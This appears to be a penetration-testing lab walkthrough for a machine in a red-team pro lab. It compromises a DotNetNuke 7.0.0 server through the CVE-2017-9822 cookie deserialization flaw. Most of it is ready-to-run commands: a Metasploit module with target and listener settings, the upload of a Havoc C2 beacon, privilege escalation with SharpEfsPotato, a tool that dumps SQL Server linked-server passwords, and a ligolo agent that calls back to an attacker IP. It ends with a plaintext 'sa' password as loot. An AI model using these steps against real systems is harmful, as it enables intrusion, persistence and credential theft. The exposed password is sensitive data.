10.10.110.10, 10.9.20.13

The IP is hosting a DotNetNuke (DNN) website.

From the page source it can be seen that the website is from 2017 running 7.0.0 version

A quick google search about DNN leads us to following DNN exploit.

[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)

Exploit Delivery and Execution

The simple and fast way to get access to this machine is to use the metasploit exploit

 [`exploit/windows/http/dnn_cookie_deserialization_rce`](https://www.exploit-db.com/exploits/48336)
sudo msfconsole
use exploit/windows/http/dnn_cookie_deserialization_rce
set RHOSTS 10.10.110.10
set LHOST tun0
set LPORT 80
exploit
sudo msfconsole -q -x "use exploit/windows/http/dnn_cookie_deserialization_rce; set RHOSTS 10.10.110.10; set LHOST tun0; set LPORT 8081; exploit"
 

Uploading Havoc Beacon

cd All\ Users\\
upload demon_new.exe

The machine name is CYWEBDW$, The OS running is Windows 2019 Server.

Host Recon - Running PrivEsc Checks

dotnet inline-execute /home/jay/prolabs/cybernatics/SharpUp.exe audit

Host Priv Esc

https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22

sliver (CASUAL_PLATFORM) > execute-assembly /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p CASUAL_PLATFORM.exe

Host Recon

The ps commands shows sqlbrowser service running.

https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/?tab=readme-ov-file

Upload all the four files and execute them.

Pivoting: Setting up ligolo proxy

Pivoting

execute agent.exe -connect 10.10.15.207:8443 --ignore-cert

Loot

  • flag.txt
Instance   LinkedServer     Username Password  
--------   ------------     -------- --------  
SQLEXPRESS m3sqlw.m3c.local sa       RDO1uDB05g